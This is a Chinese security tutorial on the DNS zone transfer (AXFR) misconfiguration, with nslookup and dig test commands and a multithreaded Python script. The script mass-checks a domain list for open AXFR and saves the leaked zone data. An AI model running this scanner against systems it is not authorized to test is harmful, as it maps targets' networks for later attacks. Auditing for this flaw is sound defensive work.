域传送漏洞
前言
DNS服务器分为:主服务器、备份服务器和缓存服务器。
域传送是指后备服务器从主服务器拷贝数据,并用得到的数据更新自身数据库。
在主备服务器之间同步数据库,需要使用“DNS域传送”(AXFR)。正常情况下,主服务器应只允许指定的备份服务器发起域传送;如果没有做来源限制,任何人都可以向它请求并拿到整个域的数据,这就是域传送漏洞。
危害:利用该漏洞可一次性获取该域的全部DNS记录(所有子域名、主机名及其对应IP),从而推断出目标的网络拓扑,为后续攻击提供目标清单。
nslookup
输入 nslookup 进入交互模式
server ns.test.edu.cn    指定要查询的DNS服务器(应为目标域的权威NS,可先用 set type=ns 查出)
ls test.edu.cn           列出该域的全部记录,实际上就是向该服务器发起一次域传送;能列出即说明存在漏洞。注意 ls 命令只有 Windows 自带的 nslookup 支持,Linux 下请改用下面的 dig。
dig
dig @ns1.test.edu.cn axfr test.edu.cn
返回完整区域记录并以“XFR size”统计结尾即表示传送成功;返回“Transfer failed.”说明服务器拒绝了传送。一个域通常有多台NS,需对每台NS分别测试,只要其中一台配置错误即构成漏洞。
EXP
nslookup+dig 批量检测脚本:先用 nslookup 取得每个域的NS记录,再用 dig 对每台NS尝试 axfr。使用前需把 target_list.txt(每行一个域名)和 BIND9\dig(Windows 版 dig)放在脚本目录下,并建立 dns 目录存放区域数据;存在漏洞的服务器写入 vulnerable_hosts.txt。
# encoding=gbk
# From my[at]lijiejie.com http://www.lijiejie.com
import os
import re
import subprocess
import threading
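urls = []
# One target per line.  Trim whitespace (readlines() keeps the trailing newline,
# which would otherwise be passed straight into the nslookup/dig command line)
# and skip blank or '#'-commented lines so they never reach a worker.
with open('target_list.txt') as fobj:
    for eachline in fobj:
        eachline = eachline.strip()
        if eachline and not eachline.startswith('#'):
            urls.append(eachline)
lock = threading.Lock()  # guards c_index, console output and the result files
c_index = 0  # index of the next entry in urls that a worker should claim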
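def _normalize_domain(line):
    """Return the domain from one target_list line: trimmed, leading 'www.' label removed."""
    domain = line.strip()
    # NOTE: the original used str.lstrip('www.'), which strips any leading run of
    # the characters 'w' and '.' ('w3.org' became '3.org').  Remove the label explicitly.
    if domain.startswith('www.'):
        domain = domain[len('www.'):]
    return domain


def _run(args):
    """Run *args* (an argv list, no shell) and return its stdout as text.

    The domain comes from target_list.txt, so it must never be spliced into a
    shell string.  stderr is left on the console, as os.popen did.  If the
    program cannot be started at all (dig binary missing, etc.) an empty string
    is returned so the caller simply finds no match instead of the worker
    thread dying.
    """
    try:
        proc = subprocess.Popen(args, stdout=subprocess.PIPE)
    except OSError as exc:
        print('!!! cannot run %s: %s' % (args[0], exc))
        return ''
    out = proc.communicate()[0]
    if not isinstance(out, str):
        # Python 3 gives bytes; the markers we match on are plain ASCII.
        out = out.decode('utf-8', 'replace')
    return out


def _transfer_succeeded(dig_output):
    """True when dig's output looks like a completed zone transfer (AXFR)."""
    return ('Transfer failed.' not in dig_output
            and 'connection timed out' not in dig_output
            and 'XFR size' in dig_output)


def test_DNS_Servers():
    """Worker: claim domains from the shared ``urls`` list and probe their nameservers for AXFR.

    For each domain the worker asks ``nslookup`` for the NS records, then runs
    ``BIND9/dig @<ns> axfr <domain>`` (relative to the current directory) against
    every nameserver found.  A server whose answer contains a zone (``XFR size``)
    and neither ``Transfer failed.`` nor ``connection timed out`` is appended to
    ``vulnerable_hosts.txt`` and its full zone dump is saved as ``dns/<server>.txt``.

    Module-level shared state: ``urls`` (targets), ``c_index`` (next index to
    claim) and ``lock``, which guards the index, console output and the result
    files.  Returns when the list is exhausted.
    """
    global c_index
    dig_path = os.path.join(os.getcwd(), 'BIND9', 'dig')
    while True:
        # Claim the next domain under the lock; the network work happens unlocked.
        with lock:
            if c_index >= len(urls):
                break  # End of list
            domain = _normalize_domain(urls[c_index])
            c_index += 1
            print("---testing:" + domain)
        if not domain:
            continue  # blank line in target_list.txt
        ns_output = _run(['nslookup', '-type=ns', domain])  # fetch DNS Server List
        # NOTE(review): assumes English nslookup output ("nameserver = ns1.example.com");
        # a localized nslookup may print something else and yield no servers.
        dns_servers = re.findall(r'nameserver = ([\w\.]+)', ns_output)
        for server in dns_servers:
            if len(server) < 5:
                # Original heuristic, kept as-is: a very short name is presumably
                # relative to the domain (e.g. 'ns1.' + domain) — TODO confirm.
                server += domain
            cmd_res = _run([dig_path, '@' + server, 'axfr', domain])
            if not _transfer_succeeded(cmd_res):
                continue
            # Serialize reporting so lines from different workers do not interleave.
            with lock:
                print('%s Vulnerable dns server found: %s %s' % ('*' * 10, server, '*' * 10))
                with open('vulnerable_hosts.txt', 'a') as f:
                    f.write('%s %s\n' % (server.ljust(30), domain))
                out_dir = 'dns'
                if not os.path.isdir(out_dir):
                    os.makedirs(out_dir)
                # server only contains [\w.] (from the regex above), so it is a safe file name.
                with open(os.path.join(out_dir, server + '.txt'), 'w') as f:
                    f.write(cmd_res)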
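WORKER_COUNT = 10  # concurrent workers; each one runs its own nslookup/dig calls

# Spawn the worker pool; every worker pulls targets from the shared list until it
# is empty, so the pool size only bounds how many probes run at once.
threads = [threading.Thread(target=test_DNS_Servers) for _ in range(WORKER_COUNT)]
for t in threads:
    t.start()
for t in threads:
    t.join()
print('All Done!')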